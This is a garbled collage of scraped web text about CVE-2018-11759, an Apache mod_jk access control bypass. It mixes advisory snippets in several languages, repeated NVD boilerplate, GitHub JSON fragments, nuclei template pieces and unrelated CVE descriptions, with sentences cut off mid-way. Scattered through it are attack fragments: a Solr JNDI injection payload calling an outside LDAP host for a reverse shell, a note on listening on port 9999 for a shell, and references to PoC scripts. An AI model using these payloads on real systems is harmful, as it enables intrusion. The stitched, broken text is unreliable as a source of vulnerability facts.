x prior to 2. CVE-2018-11759 at MITRE. If only a sub-set of the URLs supported by Tomcat were exposed via then it was possible for a specially. If your application is used in. 46 fix is released; 31/10/2018 : CVE-2018-11759 advisory is issued; 01/11/2018. An issue was discovered in OpenEXR before 2. Apache Web Server(Tomcat JK(mod_jk)Connector 1. This is a dynamic class method invocation vulnerability in include/exportUser. Network Error: ServerParseError: Sorry, something went wrong. 尽管此问题与CVE-2018-1323之间存在某些重叠之处,但它们并不完全相同。 POC 以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。 环境设定 docker-compose up -d 请耐心等待,第一次的过程可能会很长。We also display any CVSS information provided within the CVE List from the CNA. com Subject: CVE-2018-11759 Apache Tomcat JK (mod_jk) Connector path traversal CVE-2018-11759 Apache Tomcat JK (mod_jk) Connector path traversal Severity: Important Vendor: The Apache Software Foundation Versions. CVSS 3. . yml","contentType":"file"},{"name":"74cms. CVE-2018-11759. Note: NVD Analysts have published a CVSS score for this CVE based on publicly available information at the time of analysis. 0. Modified. 0. NOTICE: Legacy CVE List download formats will be phased out beginning January 1, 2024. Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer. 2. • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information. 2, a remote attacker can read unintended static files via various representations of absolute or relative pathnames, as demonstrated by file: URLs and directory traversal sequences. 4. A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. 1 data. Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer. (rjung) * Improve path parameter parsing so that the session ID specified by the session_path worker property for load-balanced workers can be. NVD Analysts use publicly available information to associate vector strings and CVSS scores. The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1. NVD Analysts use publicly available information to associate vector strings and CVSS scores. 4. Description. August 24, 2018. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in While there is some overlap between this issue and CVE-2018-1323, they are not identical. Note: NVD Analysts have published a CVSS score for this CVE based on publicly available information at the time of analysis. View Cart Exit SUSE Federal > Shop Careers. The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1. 4. > CVE-2018-15473. (rjung) * Improve path parameter parsing so that the session ID specified by the session_path worker property for load-balanced workers can be. SUSE information. New test for Apache mod_jk access control bypass (CVE-2018-11759) New test for Unauthenticated Stored XSS in WordPress Plugin WPML (CVE-2018-18069) New test for ACME mini_(web server) arbitrary file read (CVE-2018-18778) New test for OSGi Management Console Default Credentials; New test for Flex BlazeDS AMF Deserialization RCE (CVE-2017-5641) {"payload":{"allShortcutsEnabled":false,"fileTree":{"pocs":{"items":[{"name":"74cms-sqli-1. It is awaiting reanalysis which may result in further changes to the information provided. 4. NOTE: this product is unrelated to Ignite Realtime Spark. 0. CVE-2019-11759 Common Vulnerabilities and Exposures. twitter (link is external). ORG Legacy CVE List download formats will be phased out beginning January 1, 2024 New CVE List download format is. Go to for: CVSS Scores. CVE-2018-15719 Detail. Important: Information disclosure CVE-2018-11759. 」ではない;(セミコロン)を処理する問題点を修正しなかったため、迂回可能の脆弱性が発生しました。 攻撃シナリオ. **Summary:** There are multiple issues found on : 1. CVE-2018-11592 NVD Published Date: 05/31/2018 NVD Last Modified: 06/08/2018 Source: MITRE. CVE ID. 0. We also display any CVSS information provided within the CVE List. Multiple issues - session and cookies manipulation, internals IP disclosure. The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map did not handle some edge cases correctly. 2. py 该脚本可检测 CVE-2018-7602 和 CVE-2018-7600 cve-2019-6340_cmd. In Mitre's CVE dictionary: CVE-2018-11759. Go to for: CVSS Scores CPE Info. yml","path":"pocs/74cms-sqli-1. Detail. This can cause an application crash or on some platforms even the execution of remote code. An authenticated attacker could use this flaw to write to a destination outside the gluster volume. 4. 0. myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。CVE-2018-11759. CVSS v3. 44 did not handle some edge cases correctly. CVE-2020-11759 : An issue was discovered in OpenEXR before 2. 06/09/2018 : First contact with Apache Tomcat security team; 06/09/2018 : First response from Apache Tomcat security team; 13/10/2018 : mod_jk v1. CVE-2018-11759. 0. 4. Account. x CVSS Version 2. The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. 文件路径需为绝对路径. This CVE ID is unique from CVE-2018-8249. Do Macs ever get viruses like PC's do and must they normally have to use anti-virus and firewall software? started 2007-01-28 13:16:06 UTC. CVE-2018-1275 : Spring Framework, versions 5. assets","path":"1Panel loadfile 后台文件读取. 20063 and earlier, 2017. Product Actions. Synopsis The remote SUSE host is missing one or more security updates. 4, 12. 45 Fixes: * Correct regression in 1. 4. (cve-2018-1323) 今回発見された cve-2018-11759 の脆弱性に似ているように見えますが、「. 2. Description; An attacker could have caused 4 bytes of HMAC output to be written past the end of a buffer stored on the stack. 2021-11-05 ; vulfocus/youphptube-cve_2019_5120 ; vulfocus/youphptube-cve_2019_18662 ; vulfocus/wuzhicms-cve_2018_11528 ; vulfocus. 46 fix is released; 31/10/2018 : CVE-2018-11759 advisory is issued; 01/11/2018. M1至9. This exploit for CVE 2018-11759, vulnerability in apache mod_jk, module for load-balancer. Github POC. 0至8. New test for Apache Solr XXE (CVE-2017-12629)New test for RCE in Spring Security OAuth (CVE-2016-4977)New test for Apache mod_jk access control bypass (CVE-2018-11759)New test for Unauthenticated Stored XSS in WordPress Plugin WPML (CVE-2018-18069)New test for ACME mini_(web. . /:E]+] to prevent input from executing as commands on Windows systems. 监听9999端口,点击消息队列会触发命令执行,反弹Shell CVE-2020-11759: An issue was discovered in OpenEXR before 2. Supported versions that are affected are 12. This vulnerability has been modified since it was last analyzed by the NVD. This script exploit to vulnerability, and make a download of content of load balancer. Modified. Description The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map in Apache. e. If the adminpack is added to a database, an attacker able to connect to it could exploit this to force log rotation. 0 New CNA Onboarding Slides & Videos How to Become a CNA. CVE-2019-11759: Description: An attacker could have caused 4 bytes of HMAC output to be written past the end of a buffer stored on the stack. 44 did not handle some edge cases correctly. CVE - CVE-2018-11777. 4. Due to discrepancies between the specifications of and Tomcat for path handling, Apache mod_jk Connector 1. x) and prior to 4. We also display any CVSS information provided within the CVE List from the CNA. This vulnerability was named CVE-2018-11759 since 06/05/2018. Wordpress. 2. 1 Host: User-Agent: Mozilla/5. Description. 1. 44, noCVE-2020-5902 was disclosed on July 1st, 2020 by F5 Networks in K52145254 as a CVSS 10. A significant vulnerability in the WebP Codec has been unearthed, prompting major browser vendors, including Google and Mozilla, to expedite the release of updates to address the issue. 5 . 2. BaseURL}}' variables: - endpoint: | jkstatus jkstatus; requests. The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. {"payload":{"allShortcutsEnabled":false,"fileTree":{"pocs":{"items":[{"name":"74cms-sqli-1. Home > CVE > CVE-2018-13379 CVE-ID; CVE-2018-13379: Learn more at National Vulnerability Database (NVD) • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP. CVE-2018-11759 – Apache mod_jk access control bypass immunit. Apache / tomcat_jk_connector +null more. 0 to 1. Description The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1. 20 Dec 2018 Affected Packages: libapache-mod-jk Vulnerable: Yes Security database references: In Mitre's CVE dictionary: CVE-2018-11759. 45 Fixes: * Correct regression in 1. 5% High. CVE-2018-11759 at MITRE. It was found that the fix for CVE-2018-10927, CVE-2018-10928, CVE-2018-10929, CVE-2018-10930, and CVE-2018-10926 was incomplete. (rjung) * Security: CVE-2018-11759 Connector path traversal [bsc#1114612] Update to version 1. Modified. A successful attack can lead to arbitrary code execution. Skip to content Toggle navigation. 0 身份认证绕过漏洞 CVE-2020-13933Figure 1. x prior to 5. This could be used by an attacker to execute arbitrary code or more likely lead to a crash. A vulnerability in the implementation of Internet Key Exchange Version 1 (IKEv1) functionality in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. Strong Copyleft License, Build not available. If only a sub-set of the URLs supported by Tomcat were exposed via then it was. 0. twitter (link is external). Apps processor then has non-secure world full read/write access to the partition until the modem boots and configures the EFS. 2. 4. 2. 2. 46 fix is released; 31/10/2018 : CVE-2018-11759 advisory is issued; 01/11/2018. 0 Oracle WebLogic Server 12. 2. 17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal. A vulnerability in the implementation of Internet Key Exchange Version 1 (IKEv1) functionality in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. 1. 0 to 1. HIGH. resources library. Weakness. Verificación de vulnerabilidad 0x04. NVD Analysts use publicly available information to associate vector strings and CVSS scores. CVE-ID; CVE-2018-11759: Learn more at National Vulnerability Database (NVD). It is awaiting reanalysis which may result in further changes to the information provided. CVE-2017-11610 Detail. The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1. 44 that broke request handling for OPTIONS * requests. 46 Apache Tomcat版本7. 0. The proof of concept below shows how to exploit the CVE-2018-11759 as well as its impact on the information system. CVE Dictionary Entry: CVE-2018-11771 NVD Published Date: 08/16/2018 NVD Last Modified: 11/06/2023 Source: Apache Software. NVD Analysts use publicly available information to associate vector strings and CVSS scores. {"payload":{"allShortcutsEnabled":false,"fileTree":{"pocs":{"items":[{"name":"74cms-sqli-1. This could be used by an attacker to execute. This vulnerability has been modified since it was last analyzed by the NVD. 3. Apache Tomcat mod_jk JK Status Manager Access Bypass - Ixia provides application performance and security resilience solutions to validate, secure, and optimize businesses’ physical and virtual networks. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. Home > CVE > CVE-2018-5159 CVE-ID; CVE-2018-5159: Learn more at National Vulnerability Database (NVD) • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP. The urls shall use the protocol and complete addres, example: . Remote attackers may use a specially crafted request with directory-traversal sequences ('. 2. Description . This privilege escalation effectively allows a CouchDB admin user to gain arbitrary remote code execution, bypassing CVE-2017-12636 and CVE-2018-8007. More information: Raphael Arrouas and Jean Lejeune discovered an access control bypass vulnerability in mod_jk, the Apache connector for the Tomcat Java servlet engine. Github POC. Published: 23 October 2019. x) contain a Buffer Over-Read vulnerability when parsing ASN. 0. On the 'Air Print Setting' web page, if the data for 'Bonjour Service Location' at /PRESENTATION/BONJOUR is more than 251 bytes when sending data for Air Print Setting, then the device no longer functions. 5. . CVE-ID; CVE-2018-7159: Learn more at National Vulnerability Database (NVD)NVD Analysts use publicly available information to associate vector strings and CVSS scores. Home > CVE > CVE-2018-13759 CVE-ID; CVE-2018-13759: Learn more at National Vulnerability Database (NVD) • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP. Executive Summary. 2. S. 45 Fixes: * Correct regression in 1. ORG and CVE Record Format JSON are underway. 51. 0 to 7. This vulnerability affects Firefox < 70, Thunderbird < 68. 0. CVE info copied to clipboard. Description This update for apache2-mod_jk fixes the following issue : Security issue fixed : CVE-2018-11759: Fixed connector path traversal due to mishandled HTTP requests in (bsc#1114612). We also display any CVSS information provided within the CVE List from the CNA. Due to Improper Access Control of NAND-based EFS in Snapdragon Automobile, Snapdragon Mobile and Snapdragon Wear, From fastboot on a NAND-based device, the EFS partition can be erased. > CVE-2018-11776. /Content/img&idx=6. A malicious user (or attacker) can craft a message to the broker that. 4/15. CVE Dictionary Entry: CVE-2018-1159 NVD Published Date: 08/23/2018 NVD Last Modified: 10/12/2018 Source: Tenable Network Security, Inc. replies . The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. 4反序列化漏洞 CVE-2016-4437; Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483; Apache Solr JMX服务 RCE CVE-2019-12409{"payload":{"allShortcutsEnabled":false,"fileTree":{"":{"items":[{"name":"image","path":"image","contentType":"directory"},{"name":"README. yaml at master · bugbountydude/Nuclei-TamplatesBackupDescription. We also display any CVSS information provided within the CVE List from the CNA. 近日,Apache Tomcat官方发布了mod_jk存在访问控制绕过漏洞(CVE-2018-11759)的安全通告,目前PoC已经公开,请相关用户引起注意,及时采取防范措施。 Apache Tomcat JK(mod_jk)Connector是一款为Apache或IIS提供连接后台Tomcat的模块,它支持集群和负载均衡等。Search results for 'CVE-2018-11759 vulnerability checking' (Questions and Answers) 7 . 7. This vulnerability has been modified since it was last analyzed by the NVD. BZ - 1605048 - CVE-2018-1333 mod_Too much time allocated to workers, possibly leading to DoS BZ - 1633399 - CVE-2018-11763 DoS for HTTP/2. 44 did not handle some edge cases correctly. 44 did not handle some edge cases correctly. Proprietary Code CVEs: Description: CVSS Base Score: CVSS Vector String: CVE-2021-21589: Dell Unity, Unity XT, and UnityVSA versions before 5. As an impact it is known to affect confidentiality, integrity, and availability. This could be used by an attacker to execute arbitrary code or more likely lead to a crash. 2. 2. may reflect when the CVE ID was allocated. We also display any CVSS information provided within the CVE List from the CNA. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on. > CVE-2018-7489. 2. The CNA has not provided a score within the CVE. この問題は、CVE-2018-1323 の問題と重複する部分もありますが、同一の問題ではありません。. yml","path":"pocs/74cms-sqli-1. I gathered these nuclei templates from several github repositories. 2. 1. 2. (rjung) * Security: CVE-2018-11759 Connector path traversal [bsc#1114612] Update to version 1. 2. > CVE-2019-0221. e-books, white papers, videos & briefsThe mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. 2, versions 2. 011. zlib before 1. This vulnerability affects Firefox < 70, Thunderbird < 68. Federal Solutions. 1 structures can cause a stack; overflow and resulting denial of service (CVE-2018-0739) Jul10l1r4 / Identificador-CVE-2018-11759. 文件路径需为绝对路径. 2. The CNA has not provided a score within the CVE. My Templates . 2 Replies 13 Viewscve: CVE-2018-11759 cvnd: null fofa_dork: title="Apache HTTP Server Test Page powered by CentOS" shodan_dork: None version: '1. ULN > Oracle Linux CVE repository > CVE-2019-11759; CVE Details. br","contentType":"file. 5. 2. This vulnerability has been modified since it was last analyzed by the NVD. 0 to 1. CVE-2018-16759 NVD Published Date: 09/09/2018 NVD Last Modified: 11/07/2018 Source: MITRE. If only a sub-set of the URLs supported by Tomcat were exposed via then it was possible for a specially constructed request to expose application functionality through. Implement Identificador-CVE-2018-11759 with how-to, Q&A, fixes, code snippets. A flaw was found in RPC request using gfs3_rename_req in glusterfs server. 4. Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer. Timeline. Attack chain that delivered the CVE-2018-20250 exploit. CVE-2018-11759. This release of Red Hat JBoss Web Server 5. # The source has to change once the codeberg migration is done. The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. x prior to 1. TOTAL CVE Records: Transition to the all-new CVE website at Legacy CVE List download formats will be phased out beginning January 1, 2024 New CVE List download format is. 54 : Apache License 2. It is awaiting reanalysis which may result in further changes to the information provided. 44 that broke request handling for OPTIONS * requests. 0. CVE-2019-11759 . CVSS 7. postgresql before versions 10. Note: NVD Analysts have published a CVSS score for this CVE based on publicly available information at the time of analysis. CVE-2018-11759 - Apache Tomcat Connector Module(mod_jk) access control bypass. Contribute to 0nk4r/templates development by creating an account on GitHub. apache. This vulnerability has been modified since it was last analyzed by the NVD. yml","contentType":"file"},{"name":"74cms. Format String vulnerability in the Link Layer Discovery Protocol (LLDP) subsystem of Cisco IOS Software, Cisco IOS XE Software, and Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges on an affected device. NVD Analysts use publicly available information to associate vector strings and CVSS scores. If only a sub-set of the URLs supported by Tomcat were exposed via. CVE-2018-11759 Learn more at National Vulnerability Database (NVD) • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information Description Vulnerability Details : CVE-2018-11759. 06/09/2018 : First contact with Apache Tomcat security team; 06/09/2018 : First response from Apache Tomcat security team; 13/10/2018 : mod_jk v1. 1. br","path":"files_cap/example. Find and fix vulnerabilities Codespaces. This vulnerability (CVE-2018-11759) is similar to CVE-2018-1323 in that the Apache Tomcat web server (is used to specify the code for the request path, matching the URI-Worker mapping in the Apache Tomcat JK (mod_jk) connector. CVE-2018-5711. CVE-2018-18559 NVD Published Date: 10/22/2018 NVD Last Modified: 05/16/2023 Source: MITRE. 7 and 6. 0. 4. Contribute to nitish800/temp development by creating an account on GitHub. Red Hat Product Security Center Engage with our Red Hat Product Security team, access security updates, and ensure your environments are not exposed to any known security vulnerabilities. 12 allows memory corruption when deflating (i. 44 did not handle some edge cases correctly. (CVE-2018-11759) Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. Go to for: CVSS Scores. the latest industry news and security expertise. yml","contentType":"file"},{"name":"74cms. • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE. 9. Solutions. Go to for: CVSS Scores. 3. This could be used by an attacker to execute arbitrary code or more likely lead to a crash. 2. 1. {"payload":{"allShortcutsEnabled":false,"fileTree":{"pocs":{"items":[{"name":"74cms-sqli-1. {"payload":{"allShortcutsEnabled":false,"fileTree":{"pocs":{"items":[{"name":"74cms-sqli-1. This vulnerability has been modified since it was last analyzed by the NVD. 5 and versions 4. 5. CVE-ID; CVE-2018-11759: Learn more at National Vulnerability Database (NVD). LQ20I6 and 10. An attacker could have caused 4 bytes of HMAC output to be written past the end of a buffer stored on the stack. Find and fix vulnerabilities Codespaces. NVD Analysts use publicly available information to associate vector strings and CVSS scores. CVE Numbering Authorities (CNAs) Participating CNAs CNA Documents, Policies & Guidance CNA Rules, Version 3. resources library. 2. NOTICE: Transition to the all-new CVE website at WWW. exceptions import. CVE-2018-11759. The CNA has not provided a score within. 9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. Bugs. myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。2020年8月18日,Apache Shiro官方发布安全通告 Apache Shiro身份验证绕过漏洞(CVE-2020-13933),经过分析,攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。CVE-2018-11759: Fixed connector path traversal due to mishandled HTTP requests in (bsc#1114612). • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information. 3_未授权创建特权用户. Important: Information disclosure CVE-2018-11759. The vulnerability, assigned CVE-2018-11776 and first discovered in April of this year is actually a group of vulnerabilities of the same type. 06/09/2018 : First contact with Apache Tomcat security team; 06/09/2018 : First response from Apache Tomcat security team; 13/10/2018 : mod_jk v1. 44 did not handle some edge cases correctly. It is awaiting reanalysis which may result in further changes to the information provided. 46 fix is released; 31/10/2018 : CVE-2018-11759 advisory is issued; 01/11/2018. Go to for: CVSS Scores CPE Info CVE List. md","path":"README. 006. 5 and 12. cve-2018-7602_poc. py -file absolute path. Unprivileged. 0. 2. 2. 1. /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json vulhub/jboss/CVE-2017-7504 docker-compose build docker-compose up -d Thinkphp CVE-2018-5955. This is an record on the , which provides common identifiers for publicly known cybersecurity vulnerabilities. TOTAL CVE Records: Transition to the all-new CVE website at Legacy CVE List download formats will be phased out beginning January 1, 2024 New CVE List download format is. This CVE is in CISA's Known Exploited Vulnerabilities Catalog Reference CISA's BOD 22-01 and Known Exploited Vulnerabilities Catalog for further guidance and requirements. CVE-2018-11759: The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1. Follow CVE CVEnew Twitter Feed CVE on LinkedIn CVEProject on GitHub. 🍪 设置Cookie The heap buffer overflow (CVE-2023-4863) vulnerability in the WebP Codec is being actively exploited in the wild. DanielRuf/snyk-js-jquery-565129. 2. 2. mod_unique_id.